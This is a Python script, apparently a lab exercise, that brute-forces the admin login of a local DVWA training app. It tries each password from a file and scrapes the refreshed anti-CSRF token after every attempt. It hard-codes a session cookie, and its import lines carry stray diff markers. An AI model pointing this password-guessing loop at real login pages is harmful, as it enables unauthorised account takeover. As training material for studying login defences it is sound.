- from sys import argv
- import requests
- from BeautifulSoup import BeautifulSoup as Soup
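# Positional command-line arguments: the script name, the path of the
# candidate-password file, and the text that marks a successful login in the
# returned page. The unpacking raises ValueError unless exactly two
# arguments follow the script name.
scripts, filename, success_message = argv

# The password file is opened where it is read, inside a `with` block, so no
# file handle is held open (and left unclosed) at this point.

# Login form of a DVWA instance on the loopback interface.
url = "http://127.0.0.1/DVWA-master/vulnerabilities/brute/index.php"

# Cookies sent with every request: a 'security' value of 'high' and a PHP
# session id.
# NOTE(review): the PHPSESSID is a session identifier hard-coded in source;
# anyone who can read this file can present it for as long as the session
# lives. Reading it from the environment keeps it out of shared copies.
cookie = {'security': 'high', 'PHPSESSID': 'hnl44rto0q0vhd1eahjsdfml35'}

s = requests.Session()

# Initial fetch of the form page; the script reads the first hidden
# `user_token` value from this response.
target_page = s.get(url, cookies=cookie)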
def checksuccess(html):
    """Report whether *html* contains the success marker text.

    The page is parsed with BeautifulSoup and searched for text nodes equal
    to the module-level ``success_message`` (taken from the command line).
    The list of matches is printed as a debugging aid before returning.

    Returns:
        True when at least one matching text node exists, otherwise False.
    """
    matches = Soup(html).findAll(text=success_message)
    # Single-argument parenthesised print: same output as the Python 2
    # print statement.
    print(matches)
    return bool(matches)
def _read_user_token(markup):
    """Return the ``value`` of the first element named ``user_token``.

    Raises IndexError when *markup* holds no such element.
    """
    return Soup(markup).findAll(attrs={"name": "user_token"})[0].get('value')


# Token taken from the form page fetched at start-up.
csrf_token = _read_user_token(target_page.text)
print("**********Your csrf token*************" + repr(csrf_token))

with open(filename) as f:
    for password in f:
        # One login request per line of the file, with the newline stripped.
        # The token read from the page is sent under the key "csrf_token".
        payload = {
            "username": "admin",
            "password": password.strip('\n'),
            "Login": "Login",
            "csrf_token": str(csrf_token),
        }
        print(payload)

        # The credentials travel in the query string of a GET request, so
        # every candidate password is recorded in the web server's access
        # log. A run of such requests from one session is what a defender
        # would look for; the token itself puts no cap on the number of
        # attempts, which takes server-side throttling or account lockout.
        r = s.get(url, cookies=cookie, params=payload)
        print(r.text)

        success = checksuccess(r.text)
        if success:
            # `password` still carries its trailing newline here, and the
            # message has no space before it.
            print("Your password is" + password)
            break

        # Failed attempt: read the token again from the response just
        # received, for use in the next request.
        csrf_token = _read_user_token(r.text)
        print("**********Your csrf token*************" + csrf_token)

# NOTE(review): `success` is bound only inside the loop, so an empty password
# file leaves it unset and this test raises NameError.
if not success:
    print("Brute force failed")